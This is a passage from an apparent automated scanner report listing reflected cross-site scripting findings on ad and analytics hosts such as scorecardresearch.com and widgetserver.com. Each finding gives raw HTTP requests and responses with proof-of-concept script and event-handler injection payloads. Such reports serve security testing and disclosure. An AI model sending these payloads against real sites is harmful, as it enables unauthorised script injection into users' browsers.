HTTP/1.1 200 OK Server: nginx Date: Sun, 27 Feb 2011 02:32:03 GMT Content-Type: text/javascript; charset=UTF-8 Connection: keep-alive Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: bc=9CE434E0-6353-4F68 Set-Cookie: sc=6148C463-8CE9-4536 Set-Cookie: bp=NR6mPz0SXEsXB CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT Content-Length: 19542 jsonp1298773825717a5385<script>alert(1)< ...[SNIP]... |
3.11. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://apps.conduit |
Path: | /TechCrunchApp-Techcrunch |
Issue detail
The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 365ee'%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TechCrunchApp-Techcrunch Host: apps.conduit-banners.com Proxy-Connection: keep-alive Referer: http://techcrunch.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Cache-Control: private Date: Sun, 27 Feb 2011 03:31:08 GMT Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Vary: Accept-Encoding Content-Length: 4674 function imgToGoOnLoad__806157278 SharedItems.Togo.Manager ...[SNIP]... <img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp ...[SNIP]... |
3.12. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 76688<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=876688<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:51 GMT Date: Sun, 27 Feb 2011 16:44:51 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... MSCORE.purge=function(a) COMSCORE.beacon({c1:"876688<script>alert(1)< |
3.13. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload a70f0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... .length-1;b>=0;b--){f COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955a70f0<script>alert(1)< |
3.14. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 4dfb7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:02 GMT Date: Sun, 27 Feb 2011 16:45:02 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... 1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"4dfb7<script>alert(1)< |
3.15. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bc9c3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113bc9c3<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:52 GMT Date: Sun, 27 Feb 2011 16:44:52 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... e=function(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113bc9c3<script>alert(1)< |
3.16. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload aecfe<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:53 GMT Date: Sun, 27 Feb 2011 16:44:53 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... n(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113", c3:"20aecfe<script>alert(1)< |
3.17. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8fcd2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:59 GMT Date: Sun, 27 Feb 2011 16:44:59 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... r c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"48378fcd2<script>alert(1)< |
3.18. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:00 GMT Date: Sun, 27 Feb 2011 16:45:00 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... =a||_comscore;for(b=a COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"283806569b<script>alert(1)< |
3.19. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
Issue detail
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed016<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:01 GMT Date: Sun, 27 Feb 2011 16:45:01 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... mscore;for(b=a.length-1;b COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"ed016<script>alert(1)< |
3.20. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [BnId parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of the BnId request parameter is copied into the HTML document as plain text between tags. The payload d23ea<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:45:07 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56347 if(!window.WIDGETBOX){ ...[SNIP]... get","fif":"aol"}, configurationParams : {"wbx_at":"http://cdn4 processPathParameters : function(){ var fifMode = WIDGETBOX.platform if(fifMode && WIDGETBOX.platform ...[SNIP]... |
3.21. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 10] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 94f39<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:26 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56525 if(!window.WIDGETBOX){ ...[SNIP]... 75-95ef3e434575", configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.22. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 11] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload 5bcaa<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:31 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... ef3e434575","platform": configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.23. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 12] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 69f84<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:38 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... 75","platform": configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.24. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 13] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 13 is copied into the HTML document as plain text between tags. The payload 7ba35<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:45 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... ","platform":"Insert configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.25. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 14] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 9ec74<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:52 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... latform":"InsertWidget", configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.26. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 15] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 15 is copied into the HTML document as plain text between tags. The payload 16922<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:59 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... rm":"InsertWidget","fif": configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.27. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 467b6<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:45:48 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 18572 if(!window.WIDGETBOX){ ...[SNIP]... GETBOX.platform })(); WIDGETBOX.platform initializationParams : {"id":"8f8e2793-e99e-41bf configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.28. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e8572<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:45:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534 if(!window.WIDGETBOX){ ...[SNIP]... .platform.WidgetConfig = WidgetConfig; })(); WIDGETBOX.platform initializationParams : {"id":"8f8e2793-e99e-41bf configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.29. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 6] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1abe0<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:02 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... true); } }; WIDGETBOX.platform })(); WIDGETBOX.platform initializationParams : {"platform":"InsertWidget configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
3.30. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 7] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://cdn.widgetserver |
Path: | /syndication/platform |
Issue detail
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3ffef<img%20src%3daThis proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
